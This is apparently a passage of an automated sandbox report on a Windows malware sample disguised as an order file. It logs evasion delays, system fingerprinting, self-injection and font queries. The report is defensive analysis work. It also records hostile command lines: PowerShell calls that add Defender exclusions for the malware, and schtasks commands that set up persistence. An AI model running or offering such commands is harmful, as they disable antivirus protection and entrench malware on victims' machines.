                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -99890s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7412 Thread sleep count: 8756 > 30
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -99776s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -99672s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -99562s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -99453s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -99344s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -99234s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -99125s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -99016s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -98906s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -98797s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -98687s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -98578s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -98469s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -98359s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -98250s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -98140s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -98031s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -97922s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -97812s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -97703s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -97594s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -97484s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1199953s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1199844s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1199734s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1199625s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1199515s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1199406s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1199297s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1199187s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1199078s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1198969s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1198844s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1198734s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1198625s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1198515s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1198406s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1198297s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1198187s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1198078s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1197969s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1197859s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1197750s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1197640s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1197531s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1197422s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1197312s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe TID: 7548 Thread sleep time: -1197202s >= -30000s
                        Source: C:\Users\user\Desktop\Order 19A20060.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\Order 19A20060.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\Order 19A20060.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 100000
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 99875
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 99765
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 99656
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 99547
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 99437
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 99328
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 99218
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 99109
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 98999
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 98891
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 98779
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 98656
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 98547
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 98437
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 98328
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 98219
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 98109
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 98000
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 97890
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 97781
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 97668
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 97547
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 97437
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 97327
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 97218
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 97109
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 96998
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 96875
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 96765
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 96651
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 96531
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 96422
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 96312
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 96203
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 96094
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1199937
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1199828
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1199718
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1199609
                        Source: C:\Users\user\Desktop\Order 19A20060.exe Thread delayed: delay time: 1199500
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199390Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199281Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199172Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1199062Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1198953Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1198844Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1198719Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1198609Jump to behavior
                        Source: C:\Users\user\Desktop\Order 19A20060.exeThread delayed: delay time: 1198500Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 100000
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 99890
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 99776
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 99672
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 99562
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 99453
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 99344
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 99234
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 99125
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 99016
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 98906
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 98797
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 98687
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 98578
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 98469
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 98359
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 98250
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 98140
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 98031
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 97922
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 97812
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 97703
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 97594
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 97484
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1199953
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1199844
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1199734
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1199625
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1199515
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1199406
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1199297
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1199187
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1199078
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1198969
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1198844
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1198734
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1198625
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1198515
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1198406
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1198297
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1198187
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1198078
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1197969
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1197859
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1197750
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1197640
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1197531
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1197422
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1197312
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Thread delayed: delay time: 1197202
                        Source: Order 19A20060.exe, 00000008.00000002.4094832519.00000000011B6000.00000004.00000020.00020000.00000000.sdmp, SgJzugoOJvLgL.exe, 0000000F.00000002.4094814261.0000000000D97000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Process information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Process token adjusted: Debug
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Memory allocated: page read and write | page guard

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Order 19A20060.exe"
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe"
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Memory written: C:\Users\user\Desktop\Order 19A20060.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Memory written: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe base: 400000 value starts with: 4D5A
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp514A.tmp"
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Process created: C:\Users\user\Desktop\Order 19A20060.exe C:\Users\user\Desktop\Order 19A20060.exe
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SgJzugoOJvLgL" /XML "C:\Users\user\AppData\Local\Temp\tmp5E98.tmp"
                        Source: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe | Process created: C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe C:\Users\user\AppData\Roaming\SgJzugoOJvLgL.exe
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Users\user\Desktop\Order 19A20060.exe VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                        Source: C:\Users\user\Desktop\Order 19A20060.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
